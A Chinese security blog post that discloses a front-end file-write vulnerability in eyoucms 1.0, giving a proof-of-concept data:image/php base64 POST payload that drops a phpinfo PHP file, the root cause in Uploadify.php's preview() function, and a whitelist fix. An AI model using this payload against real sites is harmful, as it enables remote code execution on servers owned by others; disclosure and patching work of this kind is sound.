eyoucms(易优CMS)前台shell漏洞

  • A+
所属分类:网络安全文章
阿里代金券


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

eyoucms(易优CMS)前台getshell

eyoucms官网:www.eyoucms.com

漏洞利用

构造

  1. <?php phpinfo();

eyoucms(易优CMS)前台shell漏洞

Post数据

  1. data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

eyoucms(易优CMS)前台shell漏洞

Getshell

http://www.cesafe.com/preview/ae85d74a721b0b8bd247bc31207a12e2.php

大致利用方法就是这样的,下面分析一下该漏洞的形成原因。

漏洞详解

漏洞文件: eyoucms1.0\application\api\controller\Uploadify.php

漏洞函数:preview()

eyoucms(易优CMS)前台shell漏洞

eyoucms(易优CMS)前台shell漏洞

而我刚开始时也思考了一下,这会不会是作者故意搞的后门?带着这个问题我去问了一下加的php群的一些程序员 他们很惊讶的 表示data:image/ 居然还可以不是图片?

好吧。到这里我就基本明白为什么这个漏洞会出现了,估计作者以为data:image/ 只能是图片。

漏洞修复建议

  1. if (!in_array($type, array('jpg', 'png', 'jpeg', 'gif'), true)) {
  2.    exit;
  3. }

eyoucms(易优CMS)前台shell漏洞

CE安全网

发表评论

您必须登录才能发表评论!